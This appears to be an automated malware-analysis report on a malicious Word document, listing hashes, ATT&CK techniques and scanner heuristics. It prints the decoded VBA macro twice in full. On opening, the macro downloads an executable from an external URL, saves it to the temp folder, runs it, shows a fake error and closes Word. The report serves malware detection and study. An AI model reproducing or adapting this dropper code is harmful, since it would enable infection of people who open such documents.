Office (OLE) malware analysis — malicious · 01a7e08a26b3fbd9

MALICIOUS

Office (OLE)

518.0 KB Created: 2009-03-30 14:18:00 Authoring application: Microsoft Office Word First seen: 2014-07-15

MD5: b84d542441d02eed67e9b23e83685448 SHA-1: aabf6ead51db53e65a59626c8464bbc84f537f6c SHA-256: 01a7e08a26b3fbd9fa87354510819b45ce2c6a866b1b46246be0a5951020a7f9

402 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros are designed to execute automatically upon opening, as indicated by the AutoOpen and Document_Open subroutines. These macros call a DownloadFile function which attempts to download an executable file from 'http://baulretro.cl/tienda/cache/wp/ss.exe' and save it as 'TMP\389nvry8392y.exe'. The downloaded file is then executed using Shell. The document body itself is a lure, instructing the user to enable macros to view content, which is a common social engineering tactic.

Heuristics 14

ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Shell FullSavePath, vbNormalFocus
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    ADS.Write XML.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set XML = CreateObject("Microsoft.XMLHTTP")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Sub AutoOpen()
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Private Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    FullSavePath = Environ(SavePath) & "\" & SaveName
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://baulretro.cl/tienda/cache/wp/ss.exe� Referenced by macro
- http://baulretro.cl/tienda/cache/wp/ss.exeReferenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1795 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1795 bytes
SHA-256: `9ac1cd85685ad2f48766ff5c6c174be10cda50cb736a9089dc1762689684fba7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Auto_Open() Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe") End Sub Private Sub Workbook_Open() Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe") End Sub Private Sub AutoExec() Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe") End Sub Private Sub AutoOpen() Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe") End Sub Private Sub Document_Open() Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe") End Sub Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False) On Error Resume Next Err.Clear Set XML = CreateObject("Microsoft.XMLHTTP") Set ADS = CreateObject("ADODB.Stream") XML.Open "GET", URL, False XML.send XML.getAllResponseHeaders FullSavePath = Environ(SavePath) & "\" & SaveName ADS.Open ADS.Type = 1 ADS.Write XML.responseBody ADS.SaveToFile FullSavePath, 2 Shell FullSavePath, vbNormalFocus DownloadFile = True MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error" If 1 < 5564 Then: sSa End Function Sub sSa() Application.DisplayAlerts = False Application.Quit End Sub

SHA-256: 9ac1cd85685ad2f48766ff5c6c174be10cda50cb736a9089dc1762689684fba7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Auto_Open()
Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
End Sub
Private Sub Workbook_Open()
Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
End Sub
Private Sub AutoExec()
Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
End Sub
Private Sub AutoOpen()
Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
    On Error Resume Next
    Err.Clear

    Set XML = CreateObject("Microsoft.XMLHTTP")
    Set ADS = CreateObject("ADODB.Stream")
 
    XML.Open "GET", URL, False
    XML.send
 
    XML.getAllResponseHeaders
 
    FullSavePath = Environ(SavePath) & "\" & SaveName

    ADS.Open
    ADS.Type = 1
    ADS.Write XML.responseBody
    ADS.SaveToFile FullSavePath, 2

    Shell FullSavePath, vbNormalFocus
    DownloadFile = True
    MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
    If 1 < 5564 Then: sSa
End Function
Sub sSa()
    Application.DisplayAlerts = False
    Application.Quit
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.